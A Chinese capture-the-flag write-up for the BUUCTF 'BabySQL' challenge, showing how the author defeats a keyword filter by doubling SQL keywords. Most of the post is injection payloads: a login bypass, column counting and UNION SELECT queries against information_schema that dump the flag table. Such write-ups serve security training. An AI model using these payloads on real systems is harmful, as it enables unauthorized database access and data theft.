[极客大挑战 2019]BabySQL – buu刷题笔记

自从前几次网站被日,我对我的网站做了严格的过滤,你们这些黑客死心吧!!!

图片[1]-[极客大挑战 2019]BabySQL – buu刷题笔记-安全小天地

尝试登录 admin\'# ,登录成功,但相较于以前做的那个sql题,这个flag铁定错的

[极客大挑战 2019]LoveSQL - buu刷题记录-安全小天地
[极客大挑战 2019]LoveSQL - buu刷题记录-安全小天地
[极客大挑战 2019]LoveSQL – buu刷题记录
沐寒的头像-安全小天地大咖2022年4月14日 15:39

032415

Your password is \'fd7055ec3060d96f366f2576620868cc\'

尝试万能密码 admin\' or 1=1#,报错,猜测是关键词拦截了,经过一番测试 select,and,or,from,by都被过滤了

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \'1=1#\' and password=\'123456\'\' at line 1

经过双写之后,成功绕过

admin\' oorr 1=1#

然后就是那些语句一路高歌猛进就好

admin\' oorrder bbyy 4#
admin\' oorrder bbyy 3#
-1\' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
-1\' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=\'ctf\'#
-1\' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=\'Flag\'#
-1\' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#
图片[2]-[极客大挑战 2019]BabySQL – buu刷题笔记-安全小天地

最终flag为flag{6412beef-25f2-464f-adbf-536b39b50721}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容